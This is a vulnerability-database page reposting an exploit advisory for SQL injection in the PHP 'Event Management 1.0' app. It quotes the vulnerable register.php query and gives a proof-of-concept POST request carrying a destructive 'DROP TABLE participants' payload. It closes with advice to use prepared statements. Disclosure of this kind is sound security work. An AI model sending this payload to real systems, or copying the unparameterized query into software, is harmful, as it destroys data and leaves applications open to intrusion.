Vulners
Lucene search
Event Management 1.0 SQL Injection
`# Exploit Title: Event Management - SQL Injection
# Application: Event Management
# Date: 19.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://github.com/PuneethReddyHC
# Software Link: https://github.com/PuneethReddyHC/event-management
# Version:1.0
# Attack Type: Remote
# Tested on: Windows 10 64 bit Wampserver
# About project:
helps to register an users for on events conducted in college fests with simple logic with secured way
## Vulnerability Details:
- **Application Name**: Event Management
- **Software Link**: [Download Link](https://github.com/PuneethReddyHC/event-management)
- **Vendor Homepage**: [Vendor Homepage](https://github.com/PuneethReddyHC)
# Vulnerable code section:
# https://github.com/PuneethReddyHC/event-management/blob/master/backend/register.php#L64
<?php
// ... (other code)
if(empty($full_name) || empty($email) || empty($mobile)) {
// Error messages and actions for incomplete data
} else {
if(!preg_match($name,$full_name)){
// Error messages and actions for invalid full name
}
// Additional regex checks for email and mobile format
// Verifying mobile number length
if(!(strlen($mobile) == 10)){
// Error message and action for invalid mobile number length
}
// Database insertion operation
$sql = "INSERT INTO `participants`
(`p_id`,`event_id`, `fullname`, `email`,
`mobile`, `college`, `branch`)
VALUES (NULL,'$event_id', '$full_name', '$email',
'$mobile', '$college', '$branch')";
if(mysqli_query($con,$sql)){
// Successful registration message
echo "register_success";
echo "<script> location.href='index.php'; </script>";
exit;
}
}
// ... (other code)
?>
# Vulnerability Description:
The code in register.php is vulnerable to SQL injection, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. Additionally, the code lacks proper input validation and sanitization, making it susceptible to various forms of attacks such as cross-site scripting (XSS) and potential security risks.
# Proof of Concept (PoC):
SQL Injection:
The vulnerability can be exploited by an attacker by manipulating the input parameters. For example, the event_id parameter is directly used in the SQL query without proper validation or parameterization:
An attacker can manipulate the event_id parameter in the HTTP request to inject malicious SQL code.
PoC:
POST /event-management-master/backend/register.php HTTP/1.1
Host: localhost
event_id=1'; DROP TABLE participants; --
This could result in a SQL query like:
INSERT INTO `participants` (`p_id`,`event_id`, `fullname`, `email`, `mobile`, `college`, `branch`)
VALUES (NULL,'1'; DROP TABLE participants; --', 'test', '[email protected]', '0555555555', 'asd', 'qwe')
To mitigate this, use prepared statements or parameterized queries to ensure proper sanitization of user inputs.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4